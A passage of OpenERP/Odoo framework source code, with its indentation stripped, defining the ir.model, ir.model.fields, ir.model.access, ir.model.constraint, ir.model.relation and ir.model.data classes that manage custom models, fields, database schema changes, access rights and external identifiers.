#pseudo-method used by fields.function in ir.model/ir.model.fields
module_pool = self.pool["ir.module.module"]
installed_module_ids = module_pool.search(cr, uid, [('state','=','installed')])
installed_module_names = module_pool.read(cr, uid, installed_module_ids, ['name'], context=context)
installed_modules = set(x['name'] for x in installed_module_names)
result = {}
xml_ids = osv.osv._get_xml_ids(self, cr, uid, ids)
for k,v in xml_ids.iteritems():
result[k] = ', '.join(sorted(installed_modules & set(xml_id.split('.')[0] for xml_id in v)))
return result
class unknown(models.AbstractModel):
"""
Abstract model used as a substitute for relational fields with an unknown
comodel.
"""
_name = '_unknown'
class ir_model(osv.osv):
_name = 'ir.model'
_description = "Models"
_order = 'model'
def _is_osv_memory(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids, context=context)
res = dict.fromkeys(ids)
for model in models:
if model.model in self.pool:
res[model.id] = self.pool[model.model].is_transient()
else:
_logger.error('Missing model %s' % (model.model, ))
return res
def _search_osv_memory(self, cr, uid, model, name, domain, context=None):
if not domain:
return []
__, operator, value = domain[0]
if operator not in ['=', '!=']:
raise osv.except_osv(_("Invalid Search Criteria"), _('The osv_memory field can only be compared with = and != operator.'))
value = bool(value) if operator == '=' else not bool(value)
all_model_ids = self.search(cr, uid, [], context=context)
is_osv_mem = self._is_osv_memory(cr, uid, all_model_ids, 'osv_memory', arg=None, context=context)
return [('id', 'in', [id for id in is_osv_mem if bool(is_osv_mem[id]) == value])]
def _view_ids(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids)
res = {}
for model in models:
res[model.id] = self.pool["ir.ui.view"].search(cr, uid, [('model', '=', model.model)])
return res
def _inherited_models(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for model in self.browse(cr, uid, ids, context=context):
res[model.id] = []
inherited_models = [model_name for model_name in self.pool[model.model]._inherits]
if inherited_models:
res[model.id] = self.search(cr, uid, [('model', 'in', inherited_models)], context=context)
return res
_columns = {
'name': fields.char('Model Description', translate=True, required=True),
'model': fields.char('Model', required=True, select=1),
'info': fields.text('Information'),
'field_id': fields.one2many('ir.model.fields', 'model_id', 'Fields', required=True, copy=True),
'inherited_model_ids': fields.function(_inherited_models, type="many2many", obj="ir.model", string="Inherited models",
help="The list of models that extends the current model."),
'state': fields.selection([('manual','Custom Object'),('base','Base Object')],'Type', readonly=True),
'access_ids': fields.one2many('ir.model.access', 'model_id', 'Access'),
'osv_memory': fields.function(_is_osv_memory, string='Transient Model', type='boolean',
fnct_search=_search_osv_memory,
help="This field specifies whether the model is transient or not (i.e. if records are automatically deleted from the database or not)"),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the object is defined or inherited'),
'view_ids': fields.function(_view_ids, type='one2many', obj='ir.ui.view', string='Views'),
}
_defaults = {
'model': 'x_',
'state': 'manual',
}
def _check_model_name(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context=context):
if model.state=='manual':
if not model.model.startswith('x_'):
return False
if not re.match('^[a-z_A-Z0-9.]+$',model.model):
return False
return True
def _model_name_msg(self, cr, uid, ids, context=None):
return _('The Object name must start with x_ and not contain any special character !')
_constraints = [
(_check_model_name, _model_name_msg, ['model']),
]
_sql_constraints = [
('obj_name_uniq', 'unique (model)', 'Each model must be unique!'),
]
# overridden to allow searching both on model name (model field)
# and model description (name field)
def _name_search(self, cr, uid, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None):
if args is None:
args = []
domain = args + ['|', ('model', operator, name), ('name', operator, name)]
return self.name_get(cr, name_get_uid or uid,
super(ir_model, self).search(cr, uid, domain, limit=limit, context=context),
context=context)
def _drop_table(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context):
model_pool = self.pool[model.model]
cr.execute('select relkind from pg_class where relname=%s', (model_pool._table,))
result = cr.fetchone()
if result and result[0] == 'v':
cr.execute('DROP view %s' % (model_pool._table,))
elif result and result[0] == 'r':
cr.execute('DROP TABLE %s CASCADE' % (model_pool._table,))
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module tables
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG):
for model in self.browse(cr, user, ids, context):
if model.state != 'manual':
raise except_orm(_('Error'), _("Model '%s' contains module data and cannot be removed!") % (model.name,))
self._drop_table(cr, user, ids, context)
res = super(ir_model, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# only reload pool for normal unlink. For module uninstall the
# reload is done independently in openerp.modules.loading
cr.commit() # must be committed before reloading registry in new cursor
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context:
context = dict(context)
context.pop('__last_update', None)
# Filter out operations 4 link from field id, because openerp-web
# always write (4,id,False) even for non dirty items
if 'field_id' in vals:
vals['field_id'] = [op for op in vals['field_id'] if op[0] != 4]
return super(ir_model,self).write(cr, user, ids, vals, context)
def create(self, cr, user, vals, context=None):
if context is None:
context = {}
res = super(ir_model,self).create(cr, user, vals, context)
if vals.get('state','manual')=='manual':
# add model in registry
self.instanciate(cr, user, vals['model'], context)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def instanciate(self, cr, user, model, context=None):
if isinstance(model, unicode):
model = model.encode('utf-8')
class CustomModel(models.Model):
_name = model
_module = False
_custom = True
CustomModel._build_model(self.pool, cr)
class ir_model_fields(osv.osv):
_name = 'ir.model.fields'
_description = "Fields"
_rec_name = 'field_description'
_columns = {
'name': fields.char('Name', required=True, select=1),
'complete_name': fields.char('Complete Name', select=1),
'model': fields.char('Object Name', required=True, select=1,
help="The technical name of the model this field belongs to"),
'relation': fields.char('Object Relation',
help="For relationship fields, the technical name of the target model"),
'relation_field': fields.char('Relation Field',
help="For one2many fields, the field on the target model that implement the opposite many2one relationship"),
'model_id': fields.many2one('ir.model', 'Model', required=True, select=True, ondelete='cascade',
help="The model this field belongs to"),
'field_description': fields.char('Field Label', required=True),
'ttype': fields.selection(_get_fields_type, 'Field Type', required=True),
'selection': fields.char('Selection Options', help="List of options for a selection field, "
"specified as a Python expression defining a list of (key, label) pairs. "
"For example: [('blue','Blue'),('yellow','Yellow')]"),
'required': fields.boolean('Required'),
'readonly': fields.boolean('Readonly'),
'select_level': fields.selection([('0','Not Searchable'),('1','Always Searchable'),('2','Advanced Search (deprecated)')],'Searchable', required=True),
'translate': fields.boolean('Translatable', help="Whether values for this field can be translated (enables the translation mechanism for that field)"),
'size': fields.integer('Size'),
'state': fields.selection([('manual','Custom Field'),('base','Base Field')],'Type', required=True, readonly=True, select=1),
'on_delete': fields.selection([('cascade', 'Cascade'), ('set null', 'Set NULL'), ('restrict', 'Restrict')],
'On Delete', help='On delete property for many2one fields'),
'domain': fields.char('Domain', help="The optional domain to restrict possible values for relationship fields, "
"specified as a Python expression defining a list of triplets. "
"For example: [('color','=','red')]"),
'groups': fields.many2many('res.groups', 'ir_model_fields_group_rel', 'field_id', 'group_id', 'Groups'),
'selectable': fields.boolean('Selectable'),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the field is defined'),
'serialization_field_id': fields.many2one('ir.model.fields', 'Serialization Field', domain = "[('ttype','=','serialized')]",
ondelete='cascade', help="If set, this field will be stored in the sparse "
"structure of the serialization field, instead "
"of having its own database column. This cannot be "
"changed after creation."),
}
_rec_name='field_description'
_defaults = {
'selection': "",
'domain': "[]",
'name': 'x_',
'state': 'manual',
'on_delete': 'set null',
'select_level': '0',
'field_description': '',
'selectable': 1,
}
_order = "name"
def _check_selection(self, cr, uid, selection, context=None):
try:
selection_list = eval(selection)
except Exception:
_logger.warning('Invalid selection list definition for fields.selection', exc_info=True)
raise except_orm(_('Error'),
_("The Selection Options expression is not a valid Pythonic expression."
"Please provide an expression in the [('key','Label'), ...] format."))
check = True
if not (isinstance(selection_list, list) and selection_list):
check = False
else:
for item in selection_list:
if not (isinstance(item, (tuple,list)) and len(item) == 2):
check = False
break
if not check:
raise except_orm(_('Error'),
_("The Selection Options expression is must be in the [('key','Label'), ...] format!"))
return True
def _size_gt_zero_msg(self, cr, user, ids, context=None):
return _('Size of the field can never be less than 0 !')
_sql_constraints = [
('size_gt_zero', 'CHECK (size>=0)',_size_gt_zero_msg ),
]
def _drop_column(self, cr, uid, ids, context=None):
for field in self.browse(cr, uid, ids, context):
if field.name in MAGIC_COLUMNS:
continue
model = self.pool[field.model]
cr.execute('select relkind from pg_class where relname=%s', (model._table,))
result = cr.fetchone()
cr.execute("SELECT column_name FROM information_schema.columns WHERE table_name ='%s' and column_name='%s'" %(model._table, field.name))
column_name = cr.fetchone()
if column_name and (result and result[0] == 'r'):
cr.execute('ALTER table "%s" DROP column "%s" cascade' % (model._table, field.name))
# remove m2m relation table for custom fields
# we consider the m2m relation is only one way as it's not possible
# to specify the relation table in the interface for custom fields
# TODO master: maybe use ir.model.relations for custom fields
if field.state == 'manual' and field.ttype == 'many2many':
rel_name = model._fields[field.name].relation
cr.execute('DROP table "%s"' % (rel_name))
model._pop_field(field.name)
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module columns
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG) and \
any(field.state != 'manual' for field in self.browse(cr, user, ids, context)):
raise except_orm(_('Error'), _("This column contains module data and cannot be removed!"))
self._drop_column(cr, user, ids, context)
res = super(ir_model_fields, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# The field we just deleted might have be inherited, and registry is
# inconsistent in this case; therefore we reload the registry.
cr.commit()
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def create(self, cr, user, vals, context=None):
if 'model_id' in vals:
model_data = self.pool['ir.model'].browse(cr, user, vals['model_id'])
vals['model'] = model_data.model
if context is None:
context = {}
if vals.get('ttype', False) == 'selection':
if not vals.get('selection',False):
raise except_orm(_('Error'), _('For selection fields, the Selection Options must be given!'))
self._check_selection(cr, user, vals['selection'], context=context)
res = super(ir_model_fields,self).create(cr, user, vals, context)
if vals.get('state','manual') == 'manual':
if not vals['name'].startswith('x_'):
raise except_orm(_('Error'), _("Custom fields must have a name that starts with 'x_' !"))
if vals.get('relation',False) and not self.pool['ir.model'].search(cr, user, [('model','=',vals['relation'])]):
raise except_orm(_('Error'), _("Model %s does not exist!") % vals['relation'])
self.pool.clear_manual_fields()
if vals['model'] in self.pool:
model = self.pool[vals['model']]
if vals['model'].startswith('x_') and vals['name'] == 'x_name':
model._rec_name = 'x_name'
# re-initialize model in registry
model.__init__(self.pool, cr)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context is None:
context = {}
#For the moment renaming a sparse field or changing the storing system is not allowed. This may be done later
if 'serialization_field_id' in vals or 'name' in vals:
for field in self.browse(cr, user, ids, context=context):
if 'serialization_field_id' in vals and field.serialization_field_id.id != vals['serialization_field_id']:
raise except_orm(_('Error!'), _('Changing the storing system for field "%s" is not allowed.')%field.name)
if field.serialization_field_id and (field.name != vals['name']):
raise except_orm(_('Error!'), _('Renaming sparse field "%s" is not allowed')%field.name)
# if set, *one* column can be renamed here
column_rename = None
# names of the models to patch
patched_models = set()
if vals and ids:
checked_selection = False # need only check it once, so defer
for item in self.browse(cr, user, ids, context=context):
obj = self.pool.get(item.model)
field = getattr(obj, '_fields', {}).get(item.name)
if item.state != 'manual':
raise except_orm(_('Error!'),
_('Properties of base fields cannot be altered in this manner! '
'Please modify them through Python code, '
'preferably through a custom addon!'))
if item.ttype == 'selection' and 'selection' in vals \
and not checked_selection:
self._check_selection(cr, user, vals['selection'], context=context)
checked_selection = True
final_name = item.name
if 'name' in vals and vals['name'] != item.name:
# We need to rename the column
if column_rename:
raise except_orm(_('Error!'), _('Can only rename one column at a time!'))
if vals['name'] in obj._columns:
raise except_orm(_('Error!'), _('Cannot rename column to %s, because that column already exists!') % vals['name'])
if vals.get('state', 'manual') == 'manual' and not vals['name'].startswith('x_'):
raise except_orm(_('Error!'), _('New column name must still start with x_ , because it is a custom field!'))
if '\'' in vals['name'] or '"' in vals['name'] or ';' in vals['name']:
raise ValueError('Invalid character in column name')
column_rename = (obj, (obj._table, item.name, vals['name']))
final_name = vals['name']
if 'model_id' in vals and vals['model_id'] != item.model_id.id:
raise except_orm(_("Error!"), _("Changing the model of a field is forbidden!"))
if 'ttype' in vals and vals['ttype'] != item.ttype:
raise except_orm(_("Error!"), _("Changing the type of a column is not yet supported. "
"Please drop it and create it again!"))
# We don't check the 'state', because it might come from the context
# (thus be set for multiple fields) and will be ignored anyway.
if obj is not None and field is not None:
patched_models.add(obj._name)
# These shall never be written (modified)
for column_name in ('model_id', 'model', 'state'):
if column_name in vals:
del vals[column_name]
res = super(ir_model_fields,self).write(cr, user, ids, vals, context=context)
self.pool.clear_manual_fields()
if column_rename:
obj, rename = column_rename
cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % rename)
if column_rename or patched_models:
# setup models, this will reload all manual fields in registry
self.pool.setup_models(cr, partial=(not self.pool.ready))
if patched_models:
# We have to update _columns of the model(s) and then call their
# _auto_init to sync the db with the model. Hopefully, since write()
# was called earlier, they will be in-sync before the _auto_init.
# Anything we don't update in _columns now will be reset from
# the model into ir.model.fields (db).
ctx = dict(context,
select=vals.get('select_level', '0'),
update_custom_fields=True,
)
for model_name in patched_models:
obj = self.pool[model_name]
obj._auto_init(cr, ctx)
obj._auto_end(cr, ctx) # actually create FKs!
if column_rename or patched_models:
RegistryManager.signal_registry_change(cr.dbname)
return res
class ir_model_constraint(Model):
"""
This model tracks PostgreSQL foreign keys and constraints used by OpenERP
models.
"""
_name = 'ir.model.constraint'
_columns = {
'name': fields.char('Constraint', required=True, select=1,
help="PostgreSQL constraint or foreign key name."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'type': fields.char('Constraint Type', required=True, size=1, select=1,
help="Type of the constraint: `f` for a foreign key, "
"`u` for other constraints."),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)',
'Constraints with the same name are unique per module.'),
]
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL foreign keys and constraints tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
ids_set = set(ids)
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model.model
if model in self.pool:
table = self.pool[model]._table
else:
table = model.replace('.', '_')
name = openerp.tools.ustr(data.name)
typ = data.type
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_constraint where name=%s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
if typ == 'f':
# test if FK exists on this table (it could be on a related m2m table, in which case we ignore it)
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('f', name, table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (table, name),)
_logger.info('Dropped FK CONSTRAINT %s@%s', name, model)
if typ == 'u':
# test if constraint exists
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('u', name, table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (table, name),)
_logger.info('Dropped CONSTRAINT %s@%s', name, model)
self.unlink(cr, uid, ids, context)
class ir_model_relation(Model):
"""
This model tracks PostgreSQL tables used to implement OpenERP many2many
relations.
"""
_name = 'ir.model.relation'
_columns = {
'name': fields.char('Relation Name', required=True, select=1,
help="PostgreSQL table name implementing a many2many relation."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL many2many relations tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
ids_set = set(ids)
to_drop_table = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
name = openerp.tools.ustr(data.name)
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_relation where name = %s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
cr.execute("SELECT 1 FROM information_schema.tables WHERE table_name=%s", (name,))
if cr.fetchone() and not name in to_drop_table:
to_drop_table.append(name)
self.unlink(cr, uid, ids, context)
# drop m2m relation tables
for table in to_drop_table:
cr.execute('DROP TABLE %s CASCADE'% table,)
_logger.info('Dropped table %s', table)
cr.commit()
class ir_model_access(osv.osv):
_name = 'ir.model.access'
_columns = {
'name': fields.char('Name', required=True, select=True),
'active': fields.boolean('Active', help='If you uncheck the active field, it will disable the ACL without deleting it (if you delete a native ACL, it will be re-created when you reload the module.'),
'model_id': fields.many2one('ir.model', 'Object', required=True, domain=[('osv_memory','=', False)], select=True, ondelete='cascade'),
'group_id': fields.many2one('res.groups', 'Group', ondelete='cascade', select=True),
'perm_read': fields.boolean('Read Access'),
'perm_write': fields.boolean('Write Access'),
'perm_create': fields.boolean('Create Access'),
'perm_unlink': fields.boolean('Delete Access'),
}
_defaults = {
'active': True,
}
def check_groups(self, cr, uid, group):
grouparr = group.split('.')
if not grouparr:
return False
cr.execute("select 1 from res_groups_users_rel where uid=%s and gid IN (select res_id from ir_model_data where module=%s and name=%s)", (uid, grouparr[0], grouparr[1],))
return bool(cr.fetchone())
def check_group(self, cr, uid, model, mode, group_ids):
""" Check if a specific group has the access mode to the specified model"""
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.name
else:
model_name = model
if isinstance(group_ids, (int, long)):
group_ids = [group_ids]
for group_id in group_ids:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id = %s", (model_name, group_id)
)
r = cr.fetchone()
if r is None:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id IS NULL", (model_name, )
)
r = cr.fetchone()
access = bool(r and r[0])
if access:
return True
# pass no groups -> no access
return False
def group_names_with_access(self, cr, model_name, access_mode):
"""Returns the names of visible groups which have been granted ``access_mode`` on
the model ``model_name``.
:rtype: list
"""
assert access_mode in ['read','write','create','unlink'], 'Invalid access mode: %s' % access_mode
cr.execute('''SELECT
c.name, g.name
FROM
ir_model_access a
JOIN ir_model m ON (a.model_id=m.id)
JOIN res_groups g ON (a.group_id=g.id)
LEFT JOIN ir_module_category c ON (c.id=g.category_id)
WHERE
m.model=%s AND
a.active IS True AND
a.perm_''' + access_mode, (model_name,))
return [('%s/%s' % x) if x[0] else x[1] for x in cr.fetchall()]
# The context parameter is useful when the method translates error messages.
# But as the method raises an exception in that case, the key 'lang' might
# not be really necessary as a cache key, unless the `ormcache_context`
# decorator catches the exception (it does not at the moment.)
@tools.ormcache_context(accepted_keys=('lang',))
def check(self, cr, uid, model, mode='read', raise_exception=True, context=None):
if uid==1:
# User root have all accesses
# TODO: exclude xml-rpc requests
return True
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.model
else:
model_name = model
# TransientModel records have no access rights, only an implicit access rule
if model_name not in self.pool:
_logger.error('Missing model %s' % (model_name, ))
elif self.pool[model_name].is_transient():
return True
# We check if a specific rule exists
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' JOIN res_groups_users_rel gu ON (gu.gid = a.group_id) '
' WHERE m.model = %s '
' AND gu.uid = %s '
' AND a.active IS True '
, (model_name, uid,)
)
r = cr.fetchone()[0]
if r is None:
# there is no specific rule. We check the generic rule
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' WHERE a.group_id IS NULL '
' AND m.model = %s '
' AND a.active IS True '
, (model_name,)
)
r = cr.fetchone()[0]
if not r and raise_exception:
groups = '\n\t'.join('- %s' % g for g in self.group_names_with_access(cr, model_name, mode))
msg_heads = {
# Messages are declared in extenso so they are properly exported in translation terms
'read': _("Sorry, you are not allowed to access this document."),
'write': _("Sorry, you are not allowed to modify this document."),
'create': _("Sorry, you are not allowed to create this kind of document."),
'unlink': _("Sorry, you are not allowed to delete this document."),
}
if groups:
msg_tail = _("Only users with the following access level are currently allowed to do that") + ":\n%s\n\n(" + _("Document model") + ": %s)"
msg_params = (groups, model_name)
else:
msg_tail = _("Please contact your system administrator if you think this is an error.") + "\n\n(" + _("Document model") + ": %s)"
msg_params = (model_name,)
_logger.warning('Access Denied by ACLs for operation: %s, uid: %s, model: %s', mode, uid, model_name)
msg = '%s %s' % (msg_heads[mode], msg_tail)
raise openerp.exceptions.AccessError(msg % msg_params)
return bool(r)
__cache_clearing_methods = []
def register_cache_clearing_method(self, model, method):
self.__cache_clearing_methods.append((model, method))
def unregister_cache_clearing_method(self, model, method):
try:
i = self.__cache_clearing_methods.index((model, method))
del self.__cache_clearing_methods[i]
except ValueError:
pass
def call_cache_clearing_methods(self, cr):
self.invalidate_cache(cr, SUPERUSER_ID)
self.check.clear_cache(self) # clear the cache of check function
for model, method in self.__cache_clearing_methods:
if model in self.pool:
getattr(self.pool[model], method)()
#
# Check rights on actions
#
def write(self, cr, uid, ids, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).write(cr, uid, ids, values, context=context)
return res
def create(self, cr, uid, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).create(cr, uid, values, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).unlink(cr, uid, ids, context=context)
return res
class ir_model_data(osv.osv):
"""Holds external identifier keys for records in the database.
This has two main uses:
* allows easy data integration with third-party systems,
making import/export/sync of data possible, as records
can be uniquely identified across multiple systems
* allows tracking the origin of data installed by OpenERP
modules themselves, thus making it possible to later
update them seamlessly.
"""
_name = 'ir.model.data'
_order = 'module,model,name'
def name_get(self, cr, uid, ids, context=None):
bymodel = defaultdict(dict)
names = {}
for res in self.browse(cr, uid, ids, context=context):
bymodel[res.model][res.res_id] = res
names[res.id] = res.complete_name
#result[res.model][res.res_id] = res.id
for model, id_map in bymodel.iteritems():
try:
ng = dict(self.pool[model].name_get(cr, uid, id_map.keys(), context=context))
except Exception:
pass
else:
for r in id_map.itervalues():
names[r.id] = ng.get(r.res_id, r.complete_name)
return [(i, names[i]) for i in ids]
def _complete_name_get(self, cr, uid, ids, prop, unknow_none, context=None):
result = {}
for res in self.browse(cr, uid, ids, context=context):
result[res.id] = (res.module and (res.module + '.') or '')+res.name
return result
_columns = {
'name': fields.char('External Identifier', required=True, select=1,
help="External Key/Identifier that can be used for "
"data integration with third-party systems"),
'complete_name': fields.function(_complete_name_get, type='char', string='Complete ID'),
'model': fields.char('Model Name', required=True, select=1),
'module': fields.char('Module', required=True, select=1),
'res_id': fields.integer('Record ID', select=1,
help="ID of the target record in the database"),
'noupdate': fields.boolean('Non Updatable'),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Init Date')
}
_defaults = {
'date_init': fields.datetime.now,
'date_update': fields.datetime.now,
'noupdate': False,
'module': ''
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)', 'You cannot have multiple records with the same external ID in the same module!'),
]
def __init__(self, pool, cr):
osv.osv.__init__(self, pool, cr)
# also stored in pool to avoid being discarded along with this osv instance
if getattr(pool, 'model_data_reference_ids', None) is None:
self.pool.model_data_reference_ids = {}
# put loads on the class, in order to share it among all instances
type(self).loads = self.pool.model_data_reference_ids
def _auto_init(self, cr, context=None):
res = super(ir_model_data, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_model_data_module_name_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_model_data_module_name_index ON ir_model_data (module, name)')
return res
# NEW V8 API
@tools.ormcache(skiparg=3)
def xmlid_lookup(self, cr, uid, xmlid):
"""Low level xmlid lookup
Return (id, res_model, res_id) or raise ValueError if not found
"""
module, name = xmlid.split('.', 1)
ids = self.search(cr, uid, [('module','=',module), ('name','=', name)])
if not ids:
raise ValueError('External ID not found in the system: %s' % (xmlid))
# the sql constraints ensure us we have only one result
res = self.read(cr, uid, ids[0], ['model', 'res_id'])
if not res['res_id']:
raise ValueError('External ID not found in the system: %s' % (xmlid))
return ids[0], res['model'], res['res_id']
def xmlid_to_res_model_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Return (res_model, res_id)"""
try:
return self.xmlid_lookup(cr, uid, xmlid)[1:3]
except ValueError:
if raise_if_not_found:
raise
return (False, False)
def xmlid_to_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Returns res_id """
return self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)[1]
def xmlid_to_object(self, cr, uid, xmlid, raise_if_not_found=False, context=None):
""" Return a browse_record
if not found and raise_if_not_found is True return None
"""
t = self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)
res_model, res_id = t
if res_model and res_id:
record = self.pool[res_model].browse(cr, uid, res_id, context=context)
if record.exists():
return record
if raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (xmlid))
return None
# OLD API
def _get_id(self, cr, uid, module, xml_id):
"""Returns the id of the ir.model.data record corresponding to a given module and xml_id (cached) or raise a ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[0]
def get_object_reference(self, cr, uid, module, xml_id):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached) or raise ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[1:3]
def check_object_reference(self, cr, uid, module, xml_id, raise_on_access_error=False):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached), if and only if the user has the necessary access rights
to see that object, otherwise raise a ValueError if raise_on_access_error is True or returns a tuple (model found, False)"""
model, res_id = self.get_object_reference(cr, uid, module, xml_id)
#search on id found in result to check if current user has read access right
check_right = self.pool.get(model).search(cr, uid, [('id', '=', res_id)])
if check_right:
return model, res_id
if raise_on_access_error:
raise ValueError('Not enough access rights on the external ID: %s.%s' % (module, xml_id))
return model, False
def get_object(self, cr, uid, module, xml_id, context=None):
""" Returns a browsable record for the given module name and xml_id.
If not found, raise a ValueError or return None, depending
on the value of `raise_exception`.
"""
return self.xmlid_to_object(cr, uid, "%s.%s" % (module, xml_id), raise_if_not_found=True, context=context)
def _update_dummy(self,cr, uid, model, module, xml_id=False, store=True):
if not xml_id:
return False
id = False
try:
# One step to check the ID is defined and the record actually exists
record = self.get_object(cr, uid, module, xml_id)
if record:
id = record.id
self.loads[(module,xml_id)] = (model,id)
for table, inherit_field in self.pool[model]._inherits.iteritems():
parent_id = record[inherit_field].id
parent_xid = '%s_%s' % (xml_id, table.replace('.', '_'))
self.loads[(module, parent_xid)] = (table, parent_id)
except Exception:
pass
return id
def clear_caches(self):
""" Clears all orm caches on the object's methods
:returns: itself
"""
self.xmlid_lookup.clear_cache(self)
return self
def unlink(self, cr, uid, ids, context=None):
""" Regular unlink method, but make sure to clear the caches. """
self.clear_caches()
return super(ir_model_data,self).unlink(cr, uid, ids, context=context)
def _update(self,cr, uid, model, module, values, xml_id=False, store=True, noupdate=False, mode='init', res_id=False, context=None):
model_obj = self.pool[model]
if not context:
context = {}
# records created during module install should not display the messages of OpenChatter
context = dict(context, install_mode=True)
if xml_id and ('.' in xml_id):
assert len(xml_id.split('.'))==2, _("'%s' contains too many dots. XML ids should not contain dots ! These are used to refer to other modules data, as in module.reference_id") % xml_id
module, xml_id = xml_id.split('.')
action_id = False
if xml_id:
cr.execute('''SELECT imd.id, imd.res_id, md.id, imd.model, imd.noupdate
FROM ir_model_data imd LEFT JOIN %s md ON (imd.res_id = md.id)
WHERE imd.module=%%s AND imd.name=%%s''' % model_obj._table,
(module, xml_id))
results = cr.fetchall()
for imd_id2,res_id2,real_id2,real_model,noupdate_imd in results:
